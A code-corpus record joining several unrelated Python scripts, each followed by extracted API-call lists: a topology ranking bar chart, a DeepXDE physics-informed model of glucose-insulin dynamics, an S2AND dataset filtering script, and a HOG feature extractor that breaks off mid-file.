from matplotlib.ticker import NullFormatter # useful for `logit` scale
import numpy as np
from utils import topology, dataset
print("******* START *******")
dataset_topology = [
[9, 5, 2, 3, 7, 8, 4, 1, 6], # d 20
[], # d 21
[5, 7, 2, 6, 8, 9, 3, 1, 4], # d 22
[9, 5, 1, 2, 8, 3, 4, 6, 7], # d 23
[8, 7, 1, 5, 2, 4, 3, 6, 9], # d 24
[7, 8, 1, 5, 6, 4, 2, 3, 9], # d 25
[9, 8, 4, 5, 1, 2, 6, 7, 3], # d 26
[7, 4, 1, 2, 8, 9, 3, 5, 6], # d 27
[8, 6, 3, 4, 5, 7, 1, 2, 9], # d 28
[] # d 29
]
rankig_low = [] # ranking metric for low dataset
rankig_high = [] # ranking metric for high dataset
rankig_all = [] # ranking metric low and high dataset
for index, index_topology in enumerate([0, 1, 2, 3, 4, 5, 6, 7, 8]): # change [0, 1, 2, 3, 4, 5, 6, 7, 8]
# load data for plot
rankig_l = []
rankig_h = []
rankig_a = []
for index_dataset in [20, 22, 23, 24, 25, 26, 27, 28]: # change [0, ..., 29]
if index_dataset >= 26:
rankig_h.append(dataset_topology[index_dataset - 20][index])
else:
rankig_l.append(dataset_topology[index_dataset - 20][index])
rankig_a.append(dataset_topology[index_dataset - 20][index])
rankig_low.append(np.sum(rankig_l))
rankig_high.append(np.sum(rankig_h))
rankig_all.append(np.sum(rankig_a))
labels = topology
# rankig_low = [20, 34, 30, 35, 27]
# rankig_high = [25, 32, 34, 20, 25]
x = np.arange(len(labels)) # the label locations
width = 0.25 # the width of the bars
fig, ax = plt.subplots()
rects1 = ax.bar(x - width / 2, rankig_low, width, label='Low size')
rects2 = ax.bar(x + width / 2, rankig_high, width, label='High size')
"""rects1 = ax.bar(x - width, rankig_low, width, label='Low size')
rects2 = ax.bar(x, rankig_high, width, label='High size')
rects3 = ax.bar(x + width, rankig_all, width, label='All') """
# Add some text for labels, title and custom x-axis tick labels, etc.
ax.set_ylabel("Scores")
ax.set_xlabel("Topology")
ax.set_title("Best Topology")
ax.set_xticks(x)
ax.set_xticklabels(labels)
ax.legend()
def autolabel(rects):
"""Attach a text label above each bar in *rects*, displaying its height."""
for rect in rects:
height = rect.get_height()
ax.annotate('{}'.format(height),
xy=(rect.get_x() + rect.get_width() / 2, height),
xytext=(0, 3), # 3 points vertical offset
textcoords="offset points",
ha='center', va='bottom')
autolabel(rects1)
autolabel(rects2)
# autolabel(rects3)
fig.tight_layout()
plt.grid()
plt.show()
print("******* END *******")
# Run:
# python graphic_convergence_topology.py
|
[
"numpy.sum",
"matplotlib.pyplot.grid",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show"
] |
[((1903, 1917), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (1915, 1917), True, 'import matplotlib.pyplot as plt\n'), ((2959, 2969), 'matplotlib.pyplot.grid', 'plt.grid', ([], {}), '()\n', (2967, 2969), True, 'import matplotlib.pyplot as plt\n'), ((2970, 2980), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2978, 2980), True, 'import matplotlib.pyplot as plt\n'), ((1618, 1634), 'numpy.sum', 'np.sum', (['rankig_l'], {}), '(rankig_l)\n', (1624, 1634), True, 'import numpy as np\n'), ((1656, 1672), 'numpy.sum', 'np.sum', (['rankig_h'], {}), '(rankig_h)\n', (1662, 1672), True, 'import numpy as np\n'), ((1693, 1709), 'numpy.sum', 'np.sum', (['rankig_a'], {}), '(rankig_a)\n', (1699, 1709), True, 'import numpy as np\n')]
|
import numpy as np
import deepxde as dde
from deepxde.backend import tf
import variable_to_parameter_transform
def sbinn(data_t, data_y, meal_t, meal_q):
def get_variable(v, var):
low, up = v * 0.2, v * 1.8
l = (up - low) / 2
v1 = l * tf.tanh(var) + l + low
return v1
E_ = dde.Variable(0.0)
tp_ = dde.Variable(0.0)
ti_ = dde.Variable(0.0)
td_ = dde.Variable(0.0)
k_ = dde.Variable(0.0)
Rm_ = dde.Variable(0.0)
a1_ = dde.Variable(0.0)
C1_ = dde.Variable(0.0)
C2_ = dde.Variable(0.0)
C4_ = dde.Variable(0.0)
C5_ = dde.Variable(0.0)
Ub_ = dde.Variable(0.0)
U0_ = dde.Variable(0.0)
Um_ = dde.Variable(0.0)
Rg_ = dde.Variable(0.0)
alpha_ = dde.Variable(0.0)
beta_ = dde.Variable(0.0)
var_list_ = [
E_,
tp_,
ti_,
td_,
k_,
Rm_,
a1_,
C1_,
C2_,
C4_,
C5_,
Ub_,
U0_,
Um_,
Rg_,
alpha_,
beta_,
]
def ODE(t, y):
Ip = y[:, 0:1]
Ii = y[:, 1:2]
G = y[:, 2:3]
h1 = y[:, 3:4]
h2 = y[:, 4:5]
h3 = y[:, 5:6]
Vp = 3
Vi = 11
Vg = 10
E = (tf.tanh(E_) + 1) * 0.1 + 0.1
tp = (tf.tanh(tp_) + 1) * 2 + 4
ti = (tf.tanh(ti_) + 1) * 40 + 60
td = (tf.tanh(td_) + 1) * 25 / 6 + 25 / 3
k = get_variable(0.0083, k_)
Rm = get_variable(209, Rm_)
a1 = get_variable(6.6, a1_)
C1 = get_variable(300, C1_)
C2 = get_variable(144, C2_)
C3 = 100
C4 = get_variable(80, C4_)
C5 = get_variable(26, C5_)
Ub = get_variable(72, Ub_)
U0 = get_variable(4, U0_)
Um = get_variable(90, Um_)
Rg = get_variable(180, Rg_)
alpha = get_variable(7.5, alpha_)
beta = get_variable(1.772, beta_)
f1 = Rm * tf.math.sigmoid(G / (Vg * C1) - a1)
f2 = Ub * (1 - tf.math.exp(-G / (Vg * C2)))
kappa = (1 / Vi + 1 / (E * ti)) / C4
f3 = (U0 + Um / (1 + tf.pow(tf.maximum(kappa * Ii, 1e-3), -beta))) / (Vg * C3)
f4 = Rg * tf.sigmoid(alpha * (1 - h3 / (Vp * C5)))
dt = t - meal_t
IG = tf.math.reduce_sum(
0.5 * meal_q * k * tf.math.exp(-k * dt) * (tf.math.sign(dt) + 1),
axis=1,
keepdims=True,
)
tmp = E * (Ip / Vp - Ii / Vi)
dIP_dt = dde.grad.jacobian(y, t, i=0, j=0)
dIi_dt = dde.grad.jacobian(y, t, i=1, j=0)
dG_dt = dde.grad.jacobian(y, t, i=2, j=0)
dh1_dt = dde.grad.jacobian(y, t, i=3, j=0)
dh2_dt = dde.grad.jacobian(y, t, i=4, j=0)
dh3_dt = dde.grad.jacobian(y, t, i=5, j=0)
return [
dIP_dt - (f1 - tmp - Ip / tp),
dIi_dt - (tmp - Ii / ti),
dG_dt - (f4 + IG - f2 - f3 * G),
dh1_dt - (Ip - h1) / td,
dh2_dt - (h1 - h2) / td,
dh3_dt - (h2 - h3) / td,
]
geom = dde.geometry.TimeDomain(data_t[0, 0], data_t[-1, 0])
# Observes
n = len(data_t)
idx = np.append(
np.random.choice(np.arange(1, n - 1), size=n // 5, replace=False), [0, n - 1]
)
observe_y2 = dde.PointSetBC(data_t[idx], data_y[idx, 2:3], component=2)
np.savetxt("glucose_input.dat", np.hstack((data_t[idx], data_y[idx, 2:3])))
data = dde.data.PDE(geom, ODE, [observe_y2], anchors=data_t)
net = dde.maps.FNN([1] + [128] * 3 + [6], "swish", "Glorot normal")
def feature_transform(t):
t = 0.01 * t
return tf.concat(
(t, tf.sin(t), tf.sin(2 * t), tf.sin(3 * t), tf.sin(4 * t), tf.sin(5 * t)),
axis=1,
)
net.apply_feature_transform(feature_transform)
def output_transform(t, y):
idx = 1799
k = (data_y[idx] - data_y[0]) / (data_t[idx] - data_t[0])
b = (data_t[idx] * data_y[0] - data_t[0] * data_y[idx]) / (
data_t[idx] - data_t[0]
)
linear = k * t + b
factor = tf.math.tanh(t) * tf.math.tanh(idx - t)
return linear + factor * tf.constant([1, 1, 1e2, 1, 1, 1]) * y
net.apply_output_transform(output_transform)
model = dde.Model(data, net)
firsttrain = 10000
callbackperiod = 1000
maxepochs = 1000000
model.compile("adam", lr=1e-3, loss_weights=[0, 0, 0, 0, 0, 0, 1e-2])
model.train(epochs=firsttrain, display_every=1000)
model.compile(
"adam",
lr=1e-3,
loss_weights=[1, 1, 1e-2, 1, 1, 1, 1e-2],
external_trainable_variables=var_list_,
)
variablefilename = "variables.csv"
variable = dde.callbacks.VariableValue(
var_list_, period=callbackperiod, filename=variablefilename
)
losshistory, train_state = model.train(
epochs=maxepochs, display_every=1000, callbacks=[variable]
)
dde.saveplot(losshistory, train_state, issave=True, isplot=True)
gluc_data = np.hsplit(np.loadtxt("glucose.dat"), [1])
meal_data = np.hsplit(np.loadtxt("meal.dat"), [4])
t = gluc_data[0]
y = gluc_data[1]
meal_t = meal_data[0]
meal_q = meal_data[1]
sbinn(
t[:1800],
y[:1800],
meal_t,
meal_q,
)
variable_to_parameter_transform.variable_file(10000, 1000, 1000000, "variables.csv")
|
[
"deepxde.backend.tf.math.tanh",
"deepxde.data.PDE",
"deepxde.PointSetBC",
"deepxde.Variable",
"deepxde.Model",
"numpy.hstack",
"deepxde.backend.tf.constant",
"variable_to_parameter_transform.variable_file",
"deepxde.geometry.TimeDomain",
"deepxde.backend.tf.sigmoid",
"numpy.arange",
"deepxde.backend.tf.sin",
"deepxde.maps.FNN",
"deepxde.backend.tf.tanh",
"deepxde.backend.tf.math.exp",
"deepxde.backend.tf.math.sigmoid",
"deepxde.backend.tf.maximum",
"deepxde.grad.jacobian",
"deepxde.saveplot",
"deepxde.callbacks.VariableValue",
"deepxde.backend.tf.math.sign",
"numpy.loadtxt"
] |
[((5369, 5457), 'variable_to_parameter_transform.variable_file', 'variable_to_parameter_transform.variable_file', (['(10000)', '(1000)', '(1000000)', '"""variables.csv"""'], {}), "(10000, 1000, 1000000,\n 'variables.csv')\n", (5414, 5457), False, 'import variable_to_parameter_transform\n'), ((329, 346), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (341, 346), True, 'import deepxde as dde\n'), ((358, 375), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (370, 375), True, 'import deepxde as dde\n'), ((387, 404), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (399, 404), True, 'import deepxde as dde\n'), ((416, 433), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (428, 433), True, 'import deepxde as dde\n'), ((444, 461), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (456, 461), True, 'import deepxde as dde\n'), ((473, 490), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (485, 490), True, 'import deepxde as dde\n'), ((502, 519), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (514, 519), True, 'import deepxde as dde\n'), ((531, 548), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (543, 548), True, 'import deepxde as dde\n'), ((560, 577), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (572, 577), True, 'import deepxde as dde\n'), ((589, 606), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (601, 606), True, 'import deepxde as dde\n'), ((618, 635), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (630, 635), True, 'import deepxde as dde\n'), ((647, 664), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (659, 664), True, 'import deepxde as dde\n'), ((676, 693), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (688, 693), True, 'import deepxde as dde\n'), ((705, 722), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (717, 722), True, 'import deepxde as dde\n'), ((734, 751), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (746, 751), True, 'import deepxde as dde\n'), ((766, 783), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (778, 783), True, 'import deepxde as dde\n'), ((797, 814), 'deepxde.Variable', 'dde.Variable', (['(0.0)'], {}), '(0.0)\n', (809, 814), True, 'import deepxde as dde\n'), ((3123, 3175), 'deepxde.geometry.TimeDomain', 'dde.geometry.TimeDomain', (['data_t[0, 0]', 'data_t[-1, 0]'], {}), '(data_t[0, 0], data_t[-1, 0])\n', (3146, 3175), True, 'import deepxde as dde\n'), ((3349, 3407), 'deepxde.PointSetBC', 'dde.PointSetBC', (['data_t[idx]', 'data_y[idx, 2:3]'], {'component': '(2)'}), '(data_t[idx], data_y[idx, 2:3], component=2)\n', (3363, 3407), True, 'import deepxde as dde\n'), ((3505, 3558), 'deepxde.data.PDE', 'dde.data.PDE', (['geom', 'ODE', '[observe_y2]'], {'anchors': 'data_t'}), '(geom, ODE, [observe_y2], anchors=data_t)\n', (3517, 3558), True, 'import deepxde as dde\n'), ((3572, 3633), 'deepxde.maps.FNN', 'dde.maps.FNN', (['([1] + [128] * 3 + [6])', '"""swish"""', '"""Glorot normal"""'], {}), "([1] + [128] * 3 + [6], 'swish', 'Glorot normal')\n", (3584, 3633), True, 'import deepxde as dde\n'), ((4355, 4375), 'deepxde.Model', 'dde.Model', (['data', 'net'], {}), '(data, net)\n', (4364, 4375), True, 'import deepxde as dde\n'), ((4805, 4898), 'deepxde.callbacks.VariableValue', 'dde.callbacks.VariableValue', (['var_list_'], {'period': 'callbackperiod', 'filename': 'variablefilename'}), '(var_list_, period=callbackperiod, filename=\n variablefilename)\n', (4832, 4898), True, 'import deepxde as dde\n'), ((5037, 5101), 'deepxde.saveplot', 'dde.saveplot', (['losshistory', 'train_state'], {'issave': '(True)', 'isplot': '(True)'}), '(losshistory, train_state, issave=True, isplot=True)\n', (5049, 5101), True, 'import deepxde as dde\n'), ((5129, 5154), 'numpy.loadtxt', 'np.loadtxt', (['"""glucose.dat"""'], {}), "('glucose.dat')\n", (5139, 5154), True, 'import numpy as np\n'), ((5184, 5206), 'numpy.loadtxt', 'np.loadtxt', (['"""meal.dat"""'], {}), "('meal.dat')\n", (5194, 5206), True, 'import numpy as np\n'), ((2544, 2577), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(0)', 'j': '(0)'}), '(y, t, i=0, j=0)\n', (2561, 2577), True, 'import deepxde as dde\n'), ((2596, 2629), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(1)', 'j': '(0)'}), '(y, t, i=1, j=0)\n', (2613, 2629), True, 'import deepxde as dde\n'), ((2647, 2680), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(2)', 'j': '(0)'}), '(y, t, i=2, j=0)\n', (2664, 2680), True, 'import deepxde as dde\n'), ((2699, 2732), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(3)', 'j': '(0)'}), '(y, t, i=3, j=0)\n', (2716, 2732), True, 'import deepxde as dde\n'), ((2751, 2784), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(4)', 'j': '(0)'}), '(y, t, i=4, j=0)\n', (2768, 2784), True, 'import deepxde as dde\n'), ((2803, 2836), 'deepxde.grad.jacobian', 'dde.grad.jacobian', (['y', 't'], {'i': '(5)', 'j': '(0)'}), '(y, t, i=5, j=0)\n', (2820, 2836), True, 'import deepxde as dde\n'), ((3447, 3489), 'numpy.hstack', 'np.hstack', (['(data_t[idx], data_y[idx, 2:3])'], {}), '((data_t[idx], data_y[idx, 2:3]))\n', (3456, 3489), True, 'import numpy as np\n'), ((2006, 2041), 'deepxde.backend.tf.math.sigmoid', 'tf.math.sigmoid', (['(G / (Vg * C1) - a1)'], {}), '(G / (Vg * C1) - a1)\n', (2021, 2041), False, 'from deepxde.backend import tf\n'), ((2248, 2288), 'deepxde.backend.tf.sigmoid', 'tf.sigmoid', (['(alpha * (1 - h3 / (Vp * C5)))'], {}), '(alpha * (1 - h3 / (Vp * C5)))\n', (2258, 2288), False, 'from deepxde.backend import tf\n'), ((3263, 3282), 'numpy.arange', 'np.arange', (['(1)', '(n - 1)'], {}), '(1, n - 1)\n', (3272, 3282), True, 'import numpy as np\n'), ((4176, 4191), 'deepxde.backend.tf.math.tanh', 'tf.math.tanh', (['t'], {}), '(t)\n', (4188, 4191), False, 'from deepxde.backend import tf\n'), ((4194, 4215), 'deepxde.backend.tf.math.tanh', 'tf.math.tanh', (['(idx - t)'], {}), '(idx - t)\n', (4206, 4215), False, 'from deepxde.backend import tf\n'), ((2066, 2093), 'deepxde.backend.tf.math.exp', 'tf.math.exp', (['(-G / (Vg * C2))'], {}), '(-G / (Vg * C2))\n', (2077, 2093), False, 'from deepxde.backend import tf\n'), ((3733, 3742), 'deepxde.backend.tf.sin', 'tf.sin', (['t'], {}), '(t)\n', (3739, 3742), False, 'from deepxde.backend import tf\n'), ((3744, 3757), 'deepxde.backend.tf.sin', 'tf.sin', (['(2 * t)'], {}), '(2 * t)\n', (3750, 3757), False, 'from deepxde.backend import tf\n'), ((3759, 3772), 'deepxde.backend.tf.sin', 'tf.sin', (['(3 * t)'], {}), '(3 * t)\n', (3765, 3772), False, 'from deepxde.backend import tf\n'), ((3774, 3787), 'deepxde.backend.tf.sin', 'tf.sin', (['(4 * t)'], {}), '(4 * t)\n', (3780, 3787), False, 'from deepxde.backend import tf\n'), ((3789, 3802), 'deepxde.backend.tf.sin', 'tf.sin', (['(5 * t)'], {}), '(5 * t)\n', (3795, 3802), False, 'from deepxde.backend import tf\n'), ((275, 287), 'deepxde.backend.tf.tanh', 'tf.tanh', (['var'], {}), '(var)\n', (282, 287), False, 'from deepxde.backend import tf\n'), ((1315, 1326), 'deepxde.backend.tf.tanh', 'tf.tanh', (['E_'], {}), '(E_)\n', (1322, 1326), False, 'from deepxde.backend import tf\n'), ((1359, 1371), 'deepxde.backend.tf.tanh', 'tf.tanh', (['tp_'], {}), '(tp_)\n', (1366, 1371), False, 'from deepxde.backend import tf\n'), ((1400, 1412), 'deepxde.backend.tf.tanh', 'tf.tanh', (['ti_'], {}), '(ti_)\n', (1407, 1412), False, 'from deepxde.backend import tf\n'), ((2380, 2400), 'deepxde.backend.tf.math.exp', 'tf.math.exp', (['(-k * dt)'], {}), '(-k * dt)\n', (2391, 2400), False, 'from deepxde.backend import tf\n'), ((2404, 2420), 'deepxde.backend.tf.math.sign', 'tf.math.sign', (['dt'], {}), '(dt)\n', (2416, 2420), False, 'from deepxde.backend import tf\n'), ((4250, 4285), 'deepxde.backend.tf.constant', 'tf.constant', (['[1, 1, 100.0, 1, 1, 1]'], {}), '([1, 1, 100.0, 1, 1, 1])\n', (4261, 4285), False, 'from deepxde.backend import tf\n'), ((1443, 1455), 'deepxde.backend.tf.tanh', 'tf.tanh', (['td_'], {}), '(td_)\n', (1450, 1455), False, 'from deepxde.backend import tf\n'), ((2178, 2207), 'deepxde.backend.tf.maximum', 'tf.maximum', (['(kappa * Ii)', '(0.001)'], {}), '(kappa * Ii, 0.001)\n', (2188, 2207), False, 'from deepxde.backend import tf\n')]
|
import os
import json
import pickle
import collections
import numpy as np
from s2and.consts import CONFIG
DATA_DIR = CONFIG["main_data_dir"]
OUTPUT_DIR = os.path.join(DATA_DIR, "s2and_mini")
if not os.path.exists(OUTPUT_DIR):
os.mkdir(OUTPUT_DIR)
# excluding MEDLINE because it has no clusters
DATASETS = [
"aminer",
"arnetminer",
"inspire",
"kisti",
"pubmed",
"qian",
"zbmath",
]
BIG_BLOCK_CUTOFF = 500
TOP_BLOCKS_TO_KEEP = 1000
# load all of the artifacts of each dataset
clusters_all = []
signatures_all = []
X_all = []
keys_all = []
papers_all = []
for dataset in DATASETS:
print()
print(f"Loading data from {dataset}...")
for file_name in os.listdir(os.path.join(DATA_DIR, dataset)):
file_name = os.path.join(DATA_DIR, dataset, file_name)
if "specter" in file_name:
with open(file_name, "rb") as _pickle_file:
X, keys = pickle.load(_pickle_file)
X_all.append(X)
keys_all.append(keys)
elif "cluster" in file_name:
with open(file_name) as _json_file:
clusters = json.load(_json_file)
new_clusters = {}
for cluster_id, v in clusters.items():
new_cluster_id = f"{dataset}_{cluster_id}"
new_v = {
"cluster_id": new_cluster_id,
"signature_ids": [f"{dataset}_{i}" for i in v["signature_ids"]],
"model_version": v["model_version"],
}
new_clusters[new_cluster_id] = new_v
clusters_all.append(new_clusters)
elif "paper" in file_name:
with open(file_name) as _json_file:
papers = json.load(_json_file)
papers_all.append(papers)
elif "signature" in file_name:
with open(file_name) as _json_file:
signatures = json.load(_json_file)
new_signatures = {}
for signature_id, v in signatures.items():
new_signature_id = f"{dataset}_{signature_id}"
new_v = {
"author_id": v["author_id"], # maybe this needs to be prepended by dataset?
"paper_id": v["paper_id"],
"signature_id": new_signature_id,
"author_info": v["author_info"],
}
new_signatures[new_signature_id] = new_v
signatures_all.append(new_signatures)
else:
print(f"WARNING: Ignoring {file_name} in {dataset}")
print("Finished loading data. Filtering...")
# the goal is speed so we'll remove the largest blocks
# also only keep top 1000 blocks max
# aminer has 32k, inspire has 15k, and kisti has 7k blocks
for dataset, s, c, p, X, k in zip(DATASETS, signatures_all, clusters_all, papers_all, X_all, keys_all):
blocks = []
for v in s.values():
blocks.append(v["author_info"]["block"])
vc = collections.Counter(blocks)
blocks_to_keep = set([k for k, v in sorted(vc.items()) if v <= BIG_BLOCK_CUTOFF][:TOP_BLOCKS_TO_KEEP])
s_filtered = {k: v for k, v in s.items() if v["author_info"]["block"] in blocks_to_keep}
# filter the clusters too
c_filtered = {k: v for k, v in c.items() if np.all([i in s_filtered for i in v["signature_ids"]])}
# go back through the clusters and find the signatures we'll actually need
# need to do this because sometimes the block name is just... corrupted
# e.g. "g miller" for most signatures but "g mller" for one...
signature_keys_to_keep = set()
for v in c_filtered.values():
signature_keys_to_keep.update(v["signature_ids"])
s_filtered = {k: v for k, v in s.items() if k in signature_keys_to_keep}
# we don't need all the papers anymore. just the ones in signatures
# also the references of those
paper_ids = set([v["paper_id"] for v in s_filtered.values()])
ref_paper_ids = set()
for v in p.values():
if v["references"] is not None:
ref_paper_ids.update(v["references"])
p_filtered = {k: v for k, v in p.items() if int(k) in paper_ids or int(k) in ref_paper_ids}
# filter down the specters to those in papers only since we don't use specters for references
keys_filtered_flag = np.array([i in paper_ids for i in k.astype(int)])
k_filtered = k[keys_filtered_flag]
X_filtered = X[keys_filtered_flag, :]
# save all of the data
data_output_dir = os.path.join(DATA_DIR, "s2and_mini", dataset)
if not os.path.exists(data_output_dir):
os.mkdir(data_output_dir)
with open(os.path.join(data_output_dir, f"{dataset}_clusters.json"), "w") as _json_file:
json.dump(c_filtered, _json_file)
with open(os.path.join(data_output_dir, f"{dataset}_signatures.json"), "w") as _json_file:
json.dump(s_filtered, _json_file)
with open(os.path.join(data_output_dir, f"{dataset}_papers.json"), "w") as _json_file:
json.dump(p_filtered, _json_file)
with open(os.path.join(data_output_dir, f"{dataset}_specter.pickle"), "wb") as _pickle_file:
pickle.dump((X_filtered, k_filtered), _pickle_file)
|
[
"os.path.exists",
"pickle.dump",
"os.path.join",
"pickle.load",
"collections.Counter",
"os.mkdir",
"json.load",
"numpy.all",
"json.dump"
] |
[((156, 192), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""s2and_mini"""'], {}), "(DATA_DIR, 's2and_mini')\n", (168, 192), False, 'import os\n'), ((200, 226), 'os.path.exists', 'os.path.exists', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (214, 226), False, 'import os\n'), ((232, 252), 'os.mkdir', 'os.mkdir', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (240, 252), False, 'import os\n'), ((3052, 3079), 'collections.Counter', 'collections.Counter', (['blocks'], {}), '(blocks)\n', (3071, 3079), False, 'import collections\n'), ((4560, 4605), 'os.path.join', 'os.path.join', (['DATA_DIR', '"""s2and_mini"""', 'dataset'], {}), "(DATA_DIR, 's2and_mini', dataset)\n", (4572, 4605), False, 'import os\n'), ((705, 736), 'os.path.join', 'os.path.join', (['DATA_DIR', 'dataset'], {}), '(DATA_DIR, dataset)\n', (717, 736), False, 'import os\n'), ((759, 801), 'os.path.join', 'os.path.join', (['DATA_DIR', 'dataset', 'file_name'], {}), '(DATA_DIR, dataset, file_name)\n', (771, 801), False, 'import os\n'), ((4617, 4648), 'os.path.exists', 'os.path.exists', (['data_output_dir'], {}), '(data_output_dir)\n', (4631, 4648), False, 'import os\n'), ((4658, 4683), 'os.mkdir', 'os.mkdir', (['data_output_dir'], {}), '(data_output_dir)\n', (4666, 4683), False, 'import os\n'), ((4786, 4819), 'json.dump', 'json.dump', (['c_filtered', '_json_file'], {}), '(c_filtered, _json_file)\n', (4795, 4819), False, 'import json\n'), ((4924, 4957), 'json.dump', 'json.dump', (['s_filtered', '_json_file'], {}), '(s_filtered, _json_file)\n', (4933, 4957), False, 'import json\n'), ((5058, 5091), 'json.dump', 'json.dump', (['p_filtered', '_json_file'], {}), '(p_filtered, _json_file)\n', (5067, 5091), False, 'import json\n'), ((5198, 5249), 'pickle.dump', 'pickle.dump', (['(X_filtered, k_filtered)', '_pickle_file'], {}), '((X_filtered, k_filtered), _pickle_file)\n', (5209, 5249), False, 'import pickle\n'), ((3360, 3415), 'numpy.all', 'np.all', (["[(i in s_filtered) for i in v['signature_ids']]"], {}), "([(i in s_filtered) for i in v['signature_ids']])\n", (3366, 3415), True, 'import numpy as np\n'), ((4699, 4756), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_clusters.json"""'], {}), "(data_output_dir, f'{dataset}_clusters.json')\n", (4711, 4756), False, 'import os\n'), ((4835, 4894), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_signatures.json"""'], {}), "(data_output_dir, f'{dataset}_signatures.json')\n", (4847, 4894), False, 'import os\n'), ((4973, 5028), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_papers.json"""'], {}), "(data_output_dir, f'{dataset}_papers.json')\n", (4985, 5028), False, 'import os\n'), ((5107, 5165), 'os.path.join', 'os.path.join', (['data_output_dir', 'f"""{dataset}_specter.pickle"""'], {}), "(data_output_dir, f'{dataset}_specter.pickle')\n", (5119, 5165), False, 'import os\n'), ((919, 944), 'pickle.load', 'pickle.load', (['_pickle_file'], {}), '(_pickle_file)\n', (930, 944), False, 'import pickle\n'), ((1127, 1148), 'json.load', 'json.load', (['_json_file'], {}), '(_json_file)\n', (1136, 1148), False, 'import json\n'), ((1772, 1793), 'json.load', 'json.load', (['_json_file'], {}), '(_json_file)\n', (1781, 1793), False, 'import json\n'), ((1952, 1973), 'json.load', 'json.load', (['_json_file'], {}), '(_json_file)\n', (1961, 1973), False, 'import json\n')]
|
import os
import cv2
import numpy as np
import matplotlib.pyplot as plt
def Compute_Block(cell_gradient_box):
k=0
hog_vector = np.zeros((bin_size*4*(cell_gradient_box.shape[0] - 1)*(cell_gradient_box.shape[1] - 1)))
for i in range(cell_gradient_box.shape[0] - 1):
for j in range(cell_gradient_box.shape[1] - 1):
histogram_block = np.concatenate([cell_gradient_box[i][j],cell_gradient_box[i][j + 1],cell_gradient_box[i+1][j],cell_gradient_box[i+1][j + 1]])
#顯示圖片
#x = np.arange(1,37,1)
#plt.title('histogram_block')
#plt.bar(x,histogram_block)
#plt.savefig(r'路徑\檔名.png')
#plt.show()
#做L2範數
L2_norm = histogram_block * histogram_block
L2_norm = L2_norm.sum()
L2_norm = np.power(L2_norm,0.5)
extre_min = np.power(0.0001,2) #創一個極小值 怕L2_norm為零 分母為零
L2_norm = L2_norm + extre_min
histogram_block = histogram_block / L2_norm
#顯示圖片
#x = np.arange(1,37,1)
#plt.title('histogram_block_L2')
#plt.bar(x,histogram_block)
#plt.savefig(r'路徑\檔名.png')
#plt.show()
#把histogram_block串接起來
hog_vector[36*k : 36*(k+1)] = histogram_block
k=k+1
return hog_vector
#計算直方圖
def Cell_Gradient(cell_mag, cell_angle):
histogram_cell = np.zeros(bin_size) # 0 20 40 60 80 100 120 140 160
for k in range(cell_size):
for l in range(cell_size):
cell_mag_catch = cell_mag[k][l] #讀取[0,0]幅值
cell_angle_catch = cell_angle[k][l]#讀取[0,0]角度值
if(cell_angle_catch % 20 == 0): #如果角度是0 20 40 60 80 100 120 140 160 180直接丟值進去
bin_number = int(cell_angle_catch / 20) % bin_size #有%bin_size是因為180要丟進0的裡面設計的
histogram_cell[bin_number] += cell_mag_catch
else:#其他角度要將幅值分配
bin_number_small = int(cell_angle_catch / 20) % bin_size
bin_number_big = (bin_number_small + 1) % bin_size #有%bin_size是因為假如bin_number_small為8的話再加1會變9也就是要放進第0格裡面
ratio = cell_angle_catch % 20 #依照比例丟進bin_number_small與bin_number_big
histogram_cell[bin_number_small] += (cell_mag_catch * (1 - (ratio / 20)))
histogram_cell[bin_number_big] += (cell_mag_catch * (ratio / 20))
#顯示直方圖
#x = np.arange(0,180,20)
#plt.xlabel("angle")
#plt.ylabel("mag")
#plt.title("Histogram of Gradient")
#plt.bar(x,histogram_cell,width = 3)
#plt.savefig(r'路徑\檔名.png')
#plt.show()
return histogram_cell
def Computer_Cell(mag, angle):
cell_gradient_box = np.zeros(((int)(128 / cell_size), (int)(64 / cell_size), bin_size))
#輸入為128*64大小的影像應該會被分為->(16,8,9)
for i in range(cell_gradient_box.shape[0]): #先算cell左上角的格子的直方圖,左至右、上到下
for j in range(cell_gradient_box.shape[1]):
#找第0格~第8格的幅值
cell_mag = mag[i * cell_size:(i + 1) * cell_size,j * cell_size:(j + 1) * cell_size]
#找第0格~第8格的角度值
cell_angle = angle[i * cell_size:(i + 1) * cell_size,j * cell_size:(j + 1) * cell_size]
#計算直方圖
cell_gradient_box[i][j] = Cell_Gradient(cell_mag, cell_angle)
return cell_gradient_box
def Compute_Sobel(img):
